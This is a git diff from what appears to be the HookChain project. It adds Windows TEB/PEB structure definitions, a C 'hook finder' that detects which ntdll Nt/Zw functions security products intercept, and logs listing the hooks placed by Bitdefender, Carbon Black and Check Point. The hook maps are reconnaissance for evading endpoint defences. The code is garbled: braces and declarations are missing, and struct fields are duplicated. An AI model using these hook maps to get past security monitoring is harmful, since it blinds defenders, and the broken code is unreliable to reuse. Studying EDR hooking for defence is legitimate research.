+typedef struct _GDI_TEB_BATCH {
+ ULONG Offset;
+ ULONG Buffer[310];
+ PACTIVATION_CONTEXT ActivationContext;
+ ULONG Flags;
+ LIST_ENTRY FrameListCache;
+ ULONG Flags;
+ ULONG NextCookieSequenceNumber;
+ ULONG StackId;
+typedef struct _TEB {
+ NT_TIB NtTib;
+ PVOID EnvironmentPointer;
+ CLIENT_ID ClientId;
+ PVOID ActiveRpcHandle;
+ PVOID ThreadLocalStoragePointer;
+ PPEB ProcessEnvironmentBlock;
+ ULONG LastErrorValue;
+ ULONG CountOfOwnedCriticalSections;
+ PVOID CsrClientThread;
+ PVOID Win32ThreadInfo;
+ ULONG User32Reserved[26];
+ ULONG UserReserved[5];
+ PVOID WOW32Reserved;
+ LCID CurrentLocale;
+ ULONG FpSoftwareStatusRegister;
+ PVOID SystemReserved1[54];
+ LONG ExceptionCode;
+ PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
+ UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)];
+ ULONG TxFsContext;
+ PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
+ UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)];
+ ACTIVATION_CONTEXT_STACK ActivationContextStack;
+ UCHAR SpareBytes1[24];
+ GDI_TEB_BATCH GdiTebBatch;
+ CLIENT_ID RealClientId;
+ PVOID GdiCachedProcessHandle;
+ ULONG GdiClientPID;
+ ULONG GdiClientTID;
+ PVOID GdiThreadLocalInfo;
+ PSIZE_T Win32ClientInfo[62];
+ PVOID glDispatchTable[233];
+ PSIZE_T glReserved1[29];
+ PVOID glReserved2;
+ PVOID glSectionInfo;
+ PVOID glSection;
+ PVOID glTable;
+ PVOID glCurrentRC;
+ PVOID glContext;
+ NTSTATUS LastStatusValue;
+ UNICODE_STRING StaticUnicodeString;
+ WCHAR StaticUnicodeBuffer[261];
+ PVOID DeallocationStack;
+ PVOID TlsSlots[64];
+ LIST_ENTRY TlsLinks;
+ PVOID Vdm;
+ PVOID ReservedForNtRpc;
+ PVOID DbgSsReserved[2];
+ ULONG HardErrorMode;
+ ULONG HardErrorsAreDisabled;
+ PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
+ GUID ActivityId;
+ PVOID SubProcessTag;
+ PVOID EtwLocalData;
+ PVOID EtwTraceData;
+ PVOID Instrumentation[14];
+ PVOID SubProcessTag;
+ PVOID EtwLocalData;
+ PVOID Instrumentation[16];
+ PVOID WinSockData;
+ ULONG GdiBatchCount;
+ BOOLEAN SpareBool0;
+ BOOLEAN SpareBool1;
+ BOOLEAN SpareBool2;
+ BOOLEAN InDbgPrint;
+ BOOLEAN FreeStackOnTermination;
+ BOOLEAN HasFiberData;
+ UCHAR IdealProcessor;
+ ULONG GuaranteedStackBytes;
+ ULONG Spare3;
+ PVOID ReservedForPerf;
+ PVOID ReservedForOle;
+ ULONG WaitingOnLoaderLock;
+ PVOID SavedPriorityState;
+ ULONG_PTR SoftPatchPtr1;
+ ULONG_PTR ThreadPoolData;
+ ULONG_PTR SparePointer1;
+ ULONG_PTR SoftPatchPtr1;
+ ULONG_PTR SoftPatchPtr2;
+ Wx86ThreadState Wx86Thread;
+ PVOID* TlsExpansionSlots;
+#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
+ PVOID DeallocationBStore;
+ PVOID BStoreLimit;
+ ULONG ImpersonationLocale;
+ ULONG IsImpersonating;
+ PVOID NlsCache;
+ PVOID pShimData;
+ ULONG HeapVirtualAffinity;
+ HANDLE CurrentTransactionHandle;
+ PVOID FlsData;
+ PVOID PreferredLangauges;
+ PVOID UserPrefLanguages;
+ PVOID MergedPrefLanguages;
+ ULONG MuiImpersonation;
+ union
+ {
+ struct
+ {
+ USHORT SpareCrossTebFlags : 16;
+ };
+ USHORT CrossTebFlags;
+ };
+ union
+ {
+ struct
+ {
+ USHORT DbgSafeThunkCall : 1;
+ USHORT DbgInDebugPrint : 1;
+ USHORT DbgHasFiberData : 1;
+ USHORT DbgSkipThreadAttach : 1;
+ USHORT DbgWerInShipAssertCode : 1;
+ USHORT DbgIssuedInitialBp : 1;
+ USHORT DbgClonedThread : 1;
+ USHORT SpareSameTebBits : 9;
+ };
+ USHORT SameTebFlags;
+ };
+ PVOID TxnScopeEntercallback;
+ PVOID TxnScopeExitCAllback;
+ PVOID TxnScopeContext;
+ ULONG LockCount;
+ ULONG ProcessRundown;
+ ULONG64 LastSwitchTime;
+ ULONG64 TotalSwitchOutTime;
+ LARGE_INTEGER WaitReasonBitMap;
+ BOOLEAN SafeThunkCall;
+ BOOLEAN BooleanSpare[3];
+} TEB, * PTEB;
+typedef struct _LDR_DATA_TABLE_ENTRY {
+ LIST_ENTRY InLoadOrderLinks;
+ LIST_ENTRY InMemoryOrderLinks;
+ LIST_ENTRY InInitializationOrderLinks;
+ PVOID DllBase;
+ PVOID EntryPoint;
+ ULONG SizeOfImage;
+ ULONG Flags;
+ WORD LoadCount;
+ WORD TlsIndex;
+ union {
+ LIST_ENTRY HashLinks;
+ struct {
+ PVOID SectionPointer;
+ ULONG CheckSum;
+ };
+ };
+ union {
+ ULONG TimeDateStamp;
+ PVOID LoadedImports;
+ };
+ PACTIVATION_CONTEXT EntryPointActivationContext;
+ PVOID PatchInformation;
+ LIST_ENTRY ForwarderLinks;
+ LIST_ENTRY ServiceTagLinks;
+ LIST_ENTRY StaticLinks;
+typedef struct _OBJECT_ATTRIBUTES {
+ ULONG Length;
+ PVOID RootDirectory;
+ ULONG Attributes;
+ PVOID SecurityDescriptor;
+ PVOID SecurityQualityOfService;
+typedef struct _INITIAL_TEB {
+ PVOID StackBase;
+ PVOID StackLimit;
+ PVOID StackCommit;
+ PVOID StackCommitMax;
+ PVOID StackReserved;
+typedef enum _QUEUE_USER_APC_FLAGS {
+ QueueUserApcFlagsNone,
+ QueueUserApcFlagsSpecialUserApc,
+ QueueUserApcFlagsMaxValue
+typedef union _USER_APC_OPTION {
+ ULONG_PTR UserApcFlags;
+ HANDLE MemoryReserveHandle;
+ MemoryReserveObjectTypeUserApc,
+ MemoryReserveObjectTypeIoCompletion
+#define MemoryBasicInformation ((MEMORY_INFORMATION_CLASS)0)
+#define MemoryPrivilegedBasicInformation ((MEMORY_INFORMATION_CLASS)8)
diff --git a/HookChain/HookChain_msg.sln b/HookChain/HookChain_msg.sln
new file mode 100644
index 0000000..94aeaeb
--- /dev/null
+++ b/HookChain/HookChain_msg.sln
@@ -0,0 +1,31 @@
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.8.34330.188
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HookChain", "HookChain\HookChain.vcxproj", "{B0C08C11-23C4-495F-B40B-14066F12FAAB}"
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {B0C08C11-23C4-495F-B40B-14066F12FAAB}.Debug|x64.ActiveCfg = Debug|x64
+ {B0C08C11-23C4-495F-B40B-14066F12FAAB}.Debug|x64.Build.0 = Debug|x64
+ {B0C08C11-23C4-495F-B40B-14066F12FAAB}.Debug|x86.ActiveCfg = Debug|Win32
+ {B0C08C11-23C4-495F-B40B-14066F12FAAB}.Debug|x86.Build.0 = Debug|Win32
+ {B0C08C11-23C4-495F-B40B-14066F12FAAB}.Release|x64.ActiveCfg = Release|x64
+ {B0C08C11-23C4-495F-B40B-14066F12FAAB}.Release|x64.Build.0 = Release|x64
+ {B0C08C11-23C4-495F-B40B-14066F12FAAB}.Release|x86.ActiveCfg = Release|Win32
+ {B0C08C11-23C4-495F-B40B-14066F12FAAB}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {882B21F7-7E2B-4712-AAD3-964F097E0F07}
+ EndGlobalSection
diff --git a/enum/hookchain_finder64.7z b/enum/hookchain_finder64.7z
new file mode 100644
index 0000000..191603c
Binary files /dev/null and b/enum/hookchain_finder64.7z differ
diff --git a/enum/hookchain_finder64.c b/enum/hookchain_finder64.c
new file mode 100644
index 0000000..baea1d1
--- /dev/null
+++ b/enum/hookchain_finder64.c
@@ -0,0 +1,339 @@
+// HookChain: Hook Finder
+// Compiling gcc .\hookchain_finder64.c -o .\hookchain_finder64.exe
+#pragma comment (lib, "dbghelp.lib")
+#define MAX_NAME 255
+#define MAX_ENTRIES 1024
+typedef struct _ENTRY_INFO {
+ PVOID Address;
+ PCHAR Name;
+ BOOL IsHooked;
+typedef struct _NT_LIST
+ long Count;
+static NT_LIST NtlList;
+BOOL FillNtList();
+VOID CheckDll(CHAR *name, HANDLE baseAddress);
+VOID DumpListOfHookedDlls();
+BOOL CheckHook(CHAR *callerName, CHAR *libraryName, CHAR *functionName, DWORD64 functionAddress);
+VOID ListLoadedDlls();
+typedef struct _CPEB {
+ BOOLEAN InheritedAddressSpace;
+ BOOLEAN ReadImageFileExecOptions;
+ BOOLEAN BeingDebugged;
+ BOOLEAN Spare;
+ HANDLE Mutant;
+ PVOID ImageBase;
+ PPEB_LDR_DATA LoaderData;
+ PVOID ProcessParameters;
+ PVOID SubSystemData;
+ PVOID ProcessHeap;
+ PVOID FastPebLock;
+ PVOID FastPebLockRoutine;
+ PVOID FastPebUnlockRoutine;
+ ULONG EnvironmentUpdateCount;
+ PVOID* KernelCallbackTable;
+ PVOID EventLogSection;
+ PVOID EventLog;
+ PVOID FreeList;
+ ULONG TlsExpansionCounter;
+ PVOID TlsBitmap;
+ ULONG TlsBitmapBits[0x2];
+ PVOID ReadOnlySharedMemoryBase;
+ PVOID ReadOnlySharedMemoryHeap;
+ PVOID* ReadOnlyStaticServerData;
+ PVOID AnsiCodePageData;
+ PVOID OemCodePageData;
+ PVOID UnicodeCaseTableData;
+ ULONG NumberOfProcessors;
+ ULONG NtGlobalFlag;
+ BYTE Spare2[0x4];
+ LARGE_INTEGER CriticalSectionTimeout;
+ ULONG HeapSegmentReserve;
+ ULONG HeapSegmentCommit;
+ ULONG HeapDeCommitTotalFreeThreshold;
+ ULONG HeapDeCommitFreeBlockThreshold;
+ ULONG NumberOfHeaps;
+ ULONG MaximumNumberOfHeaps;
+ PVOID** ProcessHeaps;
+ PVOID GdiSharedHandleTable;
+ PVOID ProcessStarterHelper;
+ PVOID GdiDCAttributeList;
+ PVOID LoaderLock;
+ ULONG OSMajorVersion;
+ ULONG OSMinorVersion;
+ ULONG OSBuildNumber;
+ ULONG OSPlatformId;
+ ULONG ImageSubSystem;
+ ULONG ImageSubSystemMajorVersion;
+ ULONG ImageSubSystemMinorVersion;
+ ULONG GdiHandleBuffer[0x22];
+ ULONG PostProcessInitRoutine;
+ ULONG TlsExpansionBitmap;
+ BYTE TlsExpansionBitmapBits[0x80];
+ ULONG SessionId;
+BOOL FillNtList() {
+ printf("[+] Listing ntdll Nt/Zw functions\n------------------------------------------\n");
+ PTEB pCurrentTeb;
+ PCPEB pCurrentPeb;
+ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
+ PIMAGE_DOS_HEADER pImageDosHeader;
+ PIMAGE_NT_HEADERS pImageNtHeaders;
+ PVOID pBase;
+#if _WIN64
+ pCurrentTeb = (PTEB)__readgsqword(0x30);
+ pCurrentTeb = (PTEB)__readfsdword(0x16);
+ pCurrentPeb = (PCPEB)pCurrentTeb->ProcessEnvironmentBlock;
+ if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0x0a)
+ return FALSE;
+ pImageExportDirectory = NULL;
+ pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
+ pBase = pLdrDataEntry->DllBase;
+ pImageDosHeader = (PIMAGE_DOS_HEADER)pBase;
+ if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+ return FALSE;
+ pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pBase + pImageDosHeader->e_lfanew);
+ if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+ return FALSE;
+ pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(
+ (PBYTE)pBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress
+ );
+ PDWORD pdwFunctions;
+ PDWORD pdwNames;
+ PWORD pwNameOrdinals;
+ PDWORD pcName = NULL;
+ PVOID pAddress = NULL;
+ pdwFunctions = (PDWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfFunctions);
+ pdwNames = (PDWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfNames);
+ pwNameOrdinals = (PWORD)((PBYTE)pBase + pImageExportDirectory->AddressOfNameOrdinals);
+ PENTRY_INFO Entries = NtlList.Entries;
+ DWORD idx = 0;
+ for (WORD i = 0; i < pImageExportDirectory->NumberOfNames; i++) {
+ pcName = (PDWORD)((PBYTE)pBase + pdwNames[i]);
+ pAddress = (PBYTE)pBase + pdwFunctions[pwNameOrdinals[i]];
+ if ((*(USHORT*)pcName != 'tN') && (*(USHORT*)pcName != 'wZ'))
+ continue;
+ BOOLEAN dupFound = FALSE;
+ for (DWORD id = 0; id < idx; id++)
+ {
+ if ((DWORD64)Entries[id].Address == (DWORD64)pAddress)
+ dupFound = TRUE;
+ }
+ if (dupFound)
+ continue;
+ Entries[idx].Address = pAddress;
+ Entries[idx].Name = (PCHAR)pcName;
+ Entries[idx].IsHooked = FALSE;
+ if (*((PBYTE)pAddress) == 0xe9 || *((PBYTE)pAddress + 3) == 0xe9) Entries[idx].IsHooked = TRUE;
+ if (Entries[idx].IsHooked) printf("%s is hooked\n", pcName);
+ printf(" ntdll[%d] %s 0x%p\n", idx, pcName, pAddress);
+ idx++;
+ if (idx == MAX_ENTRIES) break;
+ }
+ // Save total number of system calls found.
+ NtlList.Count = idx;
+ printf("Mapped %d functions\n\n", NtlList.Count);
+ return TRUE;
+VOID CheckDll(CHAR *name, HANDLE imageBase) {
+ PIMAGE_DOS_HEADER pImageDosHeader;
+ PIMAGE_NT_HEADERS pImageNtHeaders;
+ HMODULE library = NULL;
+ LPCSTR libraryName = NULL;
+ pImageDosHeader = (PIMAGE_DOS_HEADER)imageBase;
+ if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+ return;
+ pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)imageBase + pImageDosHeader->e_lfanew);
+ if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+ return;
+ pImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((PBYTE)imageBase + pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
+ while (pImportDescriptor->Name != 0x00) {
+ //Get name of the DLL in the Import Table
+ libraryName = (LPCSTR)((PBYTE)imageBase + pImportDescriptor->Name);
+ if ((libraryName) && (_stricmp(libraryName, "ntdll.dll") == 0)) {
+ library = GetModuleHandleA(libraryName);
+ if (library) {
+ DWORD cnt = 0;
+ printf("Checking %s at %s IAT\n", libraryName, name);
+ //Get Import Lookup Table (OriginalFirstThunk) and Import Address Table (FirstThunk)
+ PIMAGE_THUNK_DATA originalFirstThunk = NULL, firstThunk = NULL;
+ firstThunk = (PIMAGE_THUNK_DATA) ((PBYTE) imageBase + pImportDescriptor->FirstThunk);
+ originalFirstThunk = (PIMAGE_THUNK_DATA) ((PBYTE) imageBase + pImportDescriptor->OriginalFirstThunk);
+ while ((originalFirstThunk->u1.AddressOfData != NULL) && ((originalFirstThunk->u1.AddressOfData & 0xffffffffffff) >= 0x1000)){
+ function = (PIMAGE_IMPORT_BY_NAME)((PBYTE)imageBase + originalFirstThunk->u1.AddressOfData);
+ if (CheckHook(name, (char *)libraryName, function->Name, (DWORD64)firstThunk->u1.Function)) cnt++;
+ ++originalFirstThunk;
+ ++firstThunk;
+ }
+ printf(" +-- %d hooked functions.\n\n", cnt);
+ }
+ }
+ pImportDescriptor++;
+ }
+BOOL CheckHook(CHAR *callerName, CHAR *libraryName, CHAR *functionName, DWORD64 functionAddress) {
+ BOOL hooked = FALSE;
+ char * ntHoked = "";
+ PENTRY_INFO Entries = NtlList.Entries;
+ for (DWORD i = 0; i < NtlList.Count - 1; i++)
+ {
+ if (_stricmp(functionName, Entries[i].Name) == 0)
+ printf("%s %s 0x%p, 0x%p\n", functionName, Entries[i].Name, (DWORD64)Entries[i].Address, functionAddress);
+ if ((_stricmp(functionName, Entries[i].Name) == 0) && (strlen(functionName) == strlen(Entries[i].Name)) && ((DWORD64)Entries[i].Address != functionAddress))
+ {
+ hooked = TRUE;
+ if (Entries[i].IsHooked) ntHoked = "*";
+ break;
+ }
+ }
+ if (hooked) printf(" |-- %s IAT to %s of function %s%s is hooked to 0x%p\n", callerName, libraryName, ntHoked, functionName, functionAddress);
+ return hooked;
+VOID DumpListOfHookedDlls() {
+ HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, 0);
+ me32.dwSize = sizeof(MODULEENTRY32);
+ printf("[+] Listing hooked modules\n------------------------------------------\n");
+ if(Module32First(hSnap, &me32)) {
+ do {
+ //printf("%s is loaded at 0x%p.\n", me32.szExePath, me32.modBaseAddr);
+ CheckDll((CHAR *)&me32.szModule, me32.modBaseAddr);
+ } while(Module32Next(hSnap, &me32));
+ }
+ CloseHandle(hSnap);
+VOID ListLoadedDlls() {
+ HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, 0);
+ me32.dwSize = sizeof(MODULEENTRY32);
+ printf("[+] Listing loaded modules\n------------------------------------------\n");
+ if(Module32First(hSnap, &me32)) {
+ do {
+ printf("%s is loaded at 0x%p.\n", me32.szExePath, me32.modBaseAddr);
+ } while(Module32Next(hSnap, &me32));
+ }
+ printf("\n");
+ CloseHandle(hSnap);
+int main (int argc, char **argv) {
+ printf("HookChainFinder M4v3r1ck by Sec4US Team\n\n");
+ if (!FillNtList()) {
+ printf("[-] Error getting NT... list\n");
+ ExitProcess(1);
+ }
+printf("[*] Press enter to continue..."); getchar();
+ if ( argc > 1 ) {
+ CHAR *dll = argv[1];
+ HANDLE hDll = LoadLibrary(dll);
+ printf("[+] Loading DLL %s\n------------------------------------------\n", dll);
+ if(hDll == NULL) {
+ printf("[-] Error loading DLL\n\n");
+ }else{
+ printf("%s is loaded at 0x%p.\n\n", dll, hDll);
+ }
+ CloseHandle(hDll);
+ }
+ ListLoadedDlls();
+ DumpListOfHookedDlls();
+ printf("------------------------------------------\nCompleted\n");
+ return 0;
diff --git a/enum/hookchain_finder64.exe b/enum/hookchain_finder64.exe
new file mode 100644
index 0000000..f479aa0
Binary files /dev/null and b/enum/hookchain_finder64.exe differ
diff --git a/enum/results_enum/Result.xlsx b/enum/results_enum/Result.xlsx
new file mode 100644
index 0000000..8c4a141
Binary files /dev/null and b/enum/results_enum/Result.xlsx differ
diff --git a/enum/results_enum/bitdefender.txt b/enum/results_enum/bitdefender.txt
new file mode 100644
index 0000000..b83d905
--- /dev/null
+++ b/enum/results_enum/bitdefender.txt
@@ -0,0 +1,77 @@
+[+] Listing ntdll Nt/Zw functions
+NtAdjustPrivilegesToken is hooked
+NtAlpcConnectPort is hooked
+NtAlpcCreatePort is hooked
+NtAlpcSendWaitReceivePort is hooked
+NtClose is hooked
+NtCommitTransaction is hooked
+NtCreateMutant is hooked
+NtCreateProcess is hooked
+NtCreateProcessEx is hooked
+NtCreateSection is hooked
+NtCreateSectionEx is hooked
+NtCreateSymbolicLinkObject is hooked
+NtCreateThread is hooked
+NtCreateThreadEx is hooked
+NtCreateTransaction is hooked
+NtCreateUserProcess is hooked
+NtDuplicateObject is hooked
+NtLoadDriver is hooked
+NtMapViewOfSection is hooked
+NtMapViewOfSectionEx is hooked
+NtOpenProcess is hooked
+NtQueryInformationProcess is hooked
+NtQuerySystemEnvironmentValueEx is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtRaiseHardError is hooked
+NtReadVirtualMemory is hooked
+NtResumeThread is hooked
+NtRollbackTransaction is hooked
+NtSetContextThread is hooked
+NtSetInformationThread is hooked
+NtSetInformationTransaction is hooked
+NtSetSystemEnvironmentValueEx is hooked
+NtShutdownSystem is hooked
+NtSuspendThread is hooked
+NtTerminateProcess is hooked
+NtUnmapViewOfSection is hooked
+NtWriteFile is hooked
+NtWriteVirtualMemory is hooked
+Mapped 478 functions
+[+] Listing loaded modules
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff736e80000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ff8657d0000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ff865590000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ff8632e0000.
+C:\Program Files\Bitdefender\Bitdefender Security\bdhkm\dlls_266633813365032704\bdhkm64.dll is loaded at 0x00007ff83fc20000.
+C:\Program Files\Bitdefender\Bitdefender Security\atcuf\dlls_266722497920000000\atcuf64.dll is loaded at 0x00007ff83f9e0000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ff8606c0000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ff864ae0000.
+[+] Listing hooked modules
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at bdhkm64.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at atcuf64.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
\ No newline at end of file
diff --git a/enum/results_enum/carbonblack.txt b/enum/results_enum/carbonblack.txt
new file mode 100644
index 0000000..6a0b08d
--- /dev/null
+++ b/enum/results_enum/carbonblack.txt
@@ -0,0 +1,108 @@
+[+] Listing ntdll Nt/Zw functions
+NtAllocateVirtualMemory is hooked
+NtCreateThread is hooked
+NtCreateThreadEx is hooked
+NtMapViewOfSection is hooked
+NtOpenProcess is hooked
+NtProtectVirtualMemory is hooked
+NtQueryInformationProcess is hooked
+NtQuerySystemInformation is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtReadVirtualMemory is hooked
+NtUnmapViewOfSection is hooked
+NtWriteVirtualMemory is hooked
+Mapped 478 functions
+[+] Listing loaded modules
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff7785a0000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ff836030000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ff8344d0000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ff8338b0000.
+C:\Windows\SYSTEM32\apphelp.dll is loaded at 0x00007ff82f9c0000.
+C:\Windows\system32\ctiuser.dll is loaded at 0x00007ff828060000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ff834f40000.
+C:\Windows\System32\ADVAPI32.dll is loaded at 0x00007ff834650000.
+C:\Windows\System32\sechost.dll is loaded at 0x00007ff8355e0000.
+C:\Windows\System32\RPCRT4.dll is loaded at 0x00007ff835380000.
+C:\Windows\System32\bcrypt.dll is loaded at 0x00007ff833ed0000.
+C:\Windows\system32\FLTLIB.DLL is loaded at 0x00007ff824640000.
+C:\Windows\System32\ucrtbase.dll is loaded at 0x00007ff833c20000.
+C:\Program Files\Immidio\Flex Profiles\FlexHook64.dll is loaded at 0x00000000689e0000.
+C:\Windows\System32\USER32.dll is loaded at 0x00007ff8348f0000.
+C:\Windows\System32\win32u.dll is loaded at 0x00007ff8336e0000.
+C:\Windows\System32\GDI32.dll is loaded at 0x00007ff834710000.
+C:\Windows\System32\gdi32full.dll is loaded at 0x00007ff833db0000.
+C:\Windows\System32\msvcp_win.dll is loaded at 0x00007ff833710000.
+C:\Windows\System32\SHELL32.dll is loaded at 0x00007ff835700000.
+C:\Windows\System32\SHLWAPI.dll is loaded at 0x00007ff834a90000.
+C:\Windows\SYSTEM32\USERENV.dll is loaded at 0x00007ff833590000.
+C:\Windows\System32\IMM32.DLL is loaded at 0x00007ff834e50000.
+C:\Windows\SYSTEM32\ntmarta.dll is loaded at 0x00007ff8327b0000.
+C:\Windows\system32\vmwsci.dll is loaded at 0x00007ff8334e0000.
+C:\Windows\System32\PSAPI.DLL is loaded at 0x00007ff834640000.
+[+] Listing hooked modules
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at ctiuser.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at ADVAPI32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at sechost.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at RPCRT4.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at bcrypt.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at FLTLIB.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at USER32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at GDI32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at gdi32full.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at SHELL32.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at SHLWAPI.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at USERENV.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at IMM32.DLL IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at ntmarta.dll IAT
+ +-- 0 hooked functions.
+Checking ntdll.dll at PSAPI.DLL IAT
+ +-- 0 hooked functions.
diff --git a/enum/results_enum/checkpoint.txt b/enum/results_enum/checkpoint.txt
new file mode 100644
index 0000000..2ec860f
--- /dev/null
+++ b/enum/results_enum/checkpoint.txt
@@ -0,0 +1,165 @@
+[+] Listing ntdll Nt/Zw functions
+NtAdjustPrivilegesToken is hooked
+NtAllocateVirtualMemory is hooked
+NtCreateEvent is hooked
+NtCreateMutant is hooked
+NtCreateSemaphore is hooked
+NtCreateThread is hooked
+NtCreateThreadEx is hooked
+NtDuplicateObject is hooked
+NtDuplicateToken is hooked
+NtFreeVirtualMemory is hooked
+NtMapViewOfSection is hooked
+NtOpenEvent is hooked
+NtOpenMutant is hooked
+NtOpenProcessToken is hooked
+NtOpenSemaphore is hooked
+NtProtectVirtualMemory is hooked
+NtQuerySystemInformation is hooked
+NtQuerySystemInformationEx is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtReadVirtualMemory is hooked
+NtResumeProcess is hooked
+NtResumeThread is hooked
+NtSetContextThread is hooked
+NtSetInformationProcess is hooked
+NtSetInformationThread is hooked
+NtSuspendProcess is hooked
+NtSuspendThread is hooked
+NtTerminateProcess is hooked
+NtTerminateThread is hooked
+NtUnmapViewOfSection is hooked
+NtWriteVirtualMemory is hooked
+Mapped 476 functions
+[+] Listing loaded modules
+C:\Users\M4v3r1ck\Desktop\hook\hookchain_finder64.exe is loaded at 0x00007ff6aa0d0000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ffaad0d0000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ffaac5f0000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ffaaa9b0000.
+C:\Program Files (x86)\CheckPoint\Endpoint Security\EFR\SBA_ISWWH.dll is loaded at 0x0000000078c90000.
+C:\Program Files (x86)\CheckPoint\Endpoint Security\EFR\cphnt64.dll is loaded at 0x00007ffa56f10000.
+C:\Windows\SYSTEM32\apphelp.dll is loaded at 0x00007ffaa7820000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ffaac7f0000.
+C:\Program Files\NDDigital\nddPrint\Agent\nddPrint.Agent.SpoolMonitor64.dll is loaded at 0x00007ffa9f1d0000.
+C:\Windows\System32\WS2_32.dll is loaded at 0x00007ffaabdf0000.
+C:\Windows\System32\RPCRT4.dll is loaded at 0x00007ffaacb10000.
+C:\Windows\System32\USER32.dll is loaded at 0x00007ffaac390000.
+C:\Windows\System32\win32u.dll is loaded at 0x00007ffaaa950000.
+C:\Windows\System32\GDI32.dll is loaded at 0x0000018f838c0000.
+C:\Windows\System32\gdi32full.dll is loaded at 0x00007ffaaa7b0000.
+C:\Windows\System32\msvcp_win.dll is loaded at 0x00007ffaaafe0000.
+C:\Windows\System32\ucrtbase.dll is loaded at 0x00007ffaaaee0000.
+C:\Windows\System32\ADVAPI32.dll is loaded at 0x00007ffaac6b0000.
+C:\Windows\System32\sechost.dll is loaded at 0x00007ffaac970000.
+C:\Windows\System32\SHELL32.dll is loaded at 0x00007ffaab110000.
+C:\Windows\SYSTEM32\Secur32.dll is loaded at 0x00007ffaa2640000.
+C:\Windows\SYSTEM32\nddigital.log4cxx.dll is loaded at 0x0000000180000000.
+C:\Windows\SYSTEM32\WINSPOOL.DRV is loaded at 0x00007ffa98e80000.
